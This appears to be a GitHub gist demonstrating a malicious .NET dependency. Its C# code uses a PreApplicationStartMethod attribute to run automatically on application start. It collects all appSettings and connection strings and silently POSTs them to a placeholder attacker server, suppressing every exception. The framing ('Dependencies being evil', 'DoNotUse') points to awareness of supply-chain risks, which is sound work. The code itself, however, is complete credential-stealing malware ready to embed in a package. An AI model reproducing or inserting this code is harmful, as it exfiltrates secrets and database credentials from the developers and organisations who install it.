Skip to content

Instantly share code, notes, and snippets.

@pjbgf

pjbgf/HijackingAppSettingsAndConnectionStrings.cs

Last active October 22, 2017 00:19
Show Gist options
  • Save pjbgf/406835f64d217a3c0803dc54540703e4 to your computer and use it in GitHub Desktop.
Save pjbgf/406835f64d217a3c0803dc54540703e4 to your computer and use it in GitHub Desktop.
Download ZIP
Dependencies being evil: 1 - Hijacking appsettings and connectionstrings.
Raw
HijackingAppSettingsAndConnectionStrings.cs
using System;
using System.Configuration;
using System.Net.Http;
using System.Text;
using System.Threading.Tasks;
using System.Web;
using SecurityTrap.DoNotUse;
[assembly: PreApplicationStartMethod(typeof(EvilCode), "RogueAction")]
namespace SecurityTrap.DoNotUse
{
public static class EvilCode
{
public static void RogueAction()
{
try
{
var sensitiveData = new StringBuilder();
foreach (var key in ConfigurationManager.AppSettings.AllKeys)
sensitiveData.AppendLine($"{key}:{ConfigurationManager.AppSettings[key]}");
for (int i = 0; i < ConfigurationManager.ConnectionStrings.Count; i++)
sensitiveData.AppendLine(
$"{ConfigurationManager.ConnectionStrings[i].Name}:{ConfigurationManager.ConnectionStrings[i].ConnectionString}");
Task.WaitAll(MakeRequest(sensitiveData.ToString()));
}
catch
{
}
}
private static async Task<HttpResponseMessage> MakeRequest(string value)
{
var httpClient = new HttpClient();
var content = new StringContent(value);
return await httpClient.PostAsync(new Uri("ATTACKER_SERVER"), content);
}
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment